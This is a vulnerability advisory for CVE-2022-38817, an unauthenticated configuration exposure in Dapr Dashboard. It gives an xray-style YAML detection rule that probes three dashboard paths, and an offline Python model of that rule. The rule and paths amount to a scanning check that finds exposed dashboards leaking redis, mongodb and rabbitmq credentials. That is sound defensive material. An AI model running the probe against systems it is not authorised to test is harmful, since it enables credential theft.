Vulnerability description
Dapr Dashboard v0.1.0 through v0.10.0 is vulnerable to Incorrect Access Control that allows attackers to obtain sensitive data.
Dapr Dashboard has an unauthorized access vulnerability: without any authorization, the plaintext configuration of cloud applications such as redis, mongodb and rabbitmq can be read from the dashboard, and that configuration can then be used to reach further sensitive data in the cloud environment.
"Dapr Dashboard"
id: CVE-2022-38817

info:
  name: Dapr Dashboard configurations 未授权访问漏洞
  author: For3stCo1d
  severity: high
  description: |
    Dapr Dashboard v0.1.0 through v0.10.0 is vulnerable to Incorrect Access Control that allows attackers to obtain sensitive data.
    Dapr Dashboard 存在 未授权访问漏洞,在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息,并可以进一步利用这些配置信息获取云上的敏感数据
    "Dapr Dashboard"
  reference:
    - https://github.com/dapr/dashboard/issues/222
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817
    - https://github.com/dapr/dashboard
    - http://wiki.peiqi.tech/wiki/webapp/Dapr/Dapr%20Dashboard%20configurations%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2022-38817.html

rules:
  r0:
    request:
      method: GET
      path: /components/statestore
    expression: response.status == 200 && response.body.bcontains(b'<title>Dapr Dashboard</title>')
  r1:
    request:
      method: GET
      path: /overview
    expression: response.status == 200 && response.body.bcontains(b'<title>Dapr Dashboard</title>')
  r2:
    request:
      method: GET
      path: /controlplane
    expression: response.status == 200 && response.body.bcontains(b'<title>Dapr Dashboard</title>')
expression: r0() || r1() || r2()
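The rule file above only fires when a dashboard path answers 200 with the dashboard title in the body, and the top-level expression ORs the three rules together. The following script is an added example, not part of the original page and not code from the Dapr or xray projects: it models those rule semantics offline (the `Response` class and the `RULES` table are assumptions standing in for the scanner's own objects) and runs them over constructed sample responses, so a defender can see exactly which conditions make the check match and which deployment states (an authenticating proxy redirecting to a login page, an unrelated app on the same port) leave it silent. No network requests are made.

```python
from __future__ import annotations
from dataclasses import dataclass

# Marker and paths copied from the YAML rules above.
DASHBOARD_TITLE = b"<title>Dapr Dashboard</title>"
RULES = {
    "r0": "/components/statestore",
    "r1": "/overview",
    "r2": "/controlplane",
}


@dataclass(frozen=True)
class Response:
    """Minimal stand-in (assumed, not an xray type) for the `response` object a rule sees."""
    status: int
    body: bytes


def rule_matches(resp: Response) -> bool:
    """Per-rule expression: response.status == 200 && response.body.bcontains(b'<title>Dapr Dashboard</title>')."""
    return resp.status == 200 and DASHBOARD_TITLE in resp.body


def matching_rules(responses: dict[str, Response]) -> list[str]:
    """Return the names of the rules whose path answered with a matching response.
    `responses` maps request path -> observed Response; a path that was never
    answered (e.g. connection refused) simply does not match."""
    return [
        name for name, path in RULES.items()
        if path in responses and rule_matches(responses[path])
    ]


def poc_matches(responses: dict[str, Response]) -> bool:
    """Top-level expression `r0() || r1() || r2()`: one matching rule is enough."""
    return bool(matching_rules(responses))


# --- Constructed sample responses (not captured from any real host) ---------
_DASHBOARD_PAGE = b"<html><head><title>Dapr Dashboard</title></head><body></body></html>"
_LOGIN_REDIRECT = Response(302, b"")  # auth proxy bounces the request to a login page
_OTHER_APP = Response(200, b"<html><title>Welcome</title></html>")

# Dashboard reachable without authentication: every rule fires.
EXPOSED = {path: Response(200, _DASHBOARD_PAGE) for path in RULES.values()}
# Same dashboard behind an authenticating proxy: status is not 200, nothing fires.
BEHIND_AUTH = {path: _LOGIN_REDIRECT for path in RULES.values()}
# Unrelated web app on the same port: 200 but no dashboard title, nothing fires.
UNRELATED = {path: _OTHER_APP for path in RULES.values()}
# Only /overview reachable: the OR still makes the whole PoC match.
PARTIAL = {"/overview": Response(200, _DASHBOARD_PAGE)}


if __name__ == "__main__":
    for label, sample in [("exposed", EXPOSED), ("behind auth", BEHIND_AUTH),
                          ("unrelated app", UNRELATED), ("partial", PARTIAL)]:
        print(f"{label:14s} match={poc_matches(sample)} rules={matching_rules(sample)}")
```

The `BEHIND_AUTH` case is the one to keep in mind after remediation: once the dashboard is no longer served to unauthenticated clients, none of the three paths returns 200 with the dashboard title, so the check correctly stops matching. The `PARTIAL` case shows why all three paths are worth covering in the rule file: a single reachable page is enough for the OR to report the exposure.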